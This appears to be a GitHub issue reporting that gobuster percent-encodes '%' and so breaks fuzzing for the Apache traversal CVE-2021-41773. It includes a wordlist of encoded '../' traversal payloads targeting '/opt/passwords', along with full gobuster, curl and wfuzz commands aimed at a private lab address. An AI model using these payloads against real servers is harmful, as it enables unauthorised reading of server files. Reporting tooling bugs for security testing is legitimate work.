Skip to content

Automatic encoding of percent sign #618

New issue
New issue
Open
Open
Automatic encoding of percent sign#618
@plmi

Description

@plmi
plmi
opened on Nov 30, 2025

Hi,
I've noticed a weird behavior while fuzzing a directory traversal for CVE-2021-41773 (some Apache Directory Traversal).

Description:
It seems that the percent sign is automatically encoded using %25 resulting in failed fuzzing attempts.

My gobuster --version output. I'm running running Kali 6.16.8-1kali1 in a UTM virtual machine on a M4 Macbook Pro.

gobuster version 3.8
Build info:
go      go1.24.4
path    github.com/OJ/gobuster
build   -buildmode=exe
build   -compiler=gc
build   -trimpath=true
build   DefaultGODEBUG=asynctimerchan=1,gotestjsonbuildtext=1,gotypesalias=0,httplaxcontentlength=1,httpmuxgo121=1,httpservecontentkeepheaders=1,multipathtcp=0,netedns0=0,panicnil=1,randseednop=0,rsa1024min=0,tls10server=1,tls3des=1,tlsmlkem=0,tlsrsakex=1,tlsunsafeekm=1,winreadlinkvolume=0,winsymlink=0,x509keypairleaf=0,x509negativeserial=1,x509rsacrt=0,x509usepolicies=0
build   CGO_ENABLED=1
build   GOARCH=arm64
build   GOOS=linux
build   GOARM64=v8.0

Steps to reproduce:

  • Use a wordlist with URL encoding e.g.,
%2e%2e/opt/passwords
%2e%2e/%2e%2e/opt/passwords
%2e%2e/%2e%2e/%2e%2e/opt/passwords
%2e%2e/%2e%2e/%2e%2e/%2e%2e/opt/passwords
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/opt/passwords
  • Try those directories on target:
gobuster fuzz -u http://192.168.187.16:80/cgi-bin/FUZZ -w /tmp/wordlist.txt -t 5 -b 404,403,400 --proxy http://127.0.0.1:8080

The attack did not find anything although I knew that at least two paths are correct. I've checked Burp and saw that the requested URLs are actually different.

Image

It seems that the % sign is automatically encoded using %25 that's why my command failed. I would have expected that the wordlist is used as is. I would have expected a behavior similar to curl --path-as-is http://192.168.187.16:80/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/opt/passwords.

I've tried it again with wfuzz and here the requests seem to be unchanged. No additional encoding of the % sign and the attack finds the file.

wfuzz -c -z file,/tmp/wordlist.txt --hc 404 -p 127.0.0.1:8080:HTTP http://192.168.187.16:80/cgi-bin/FUZZ
Image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions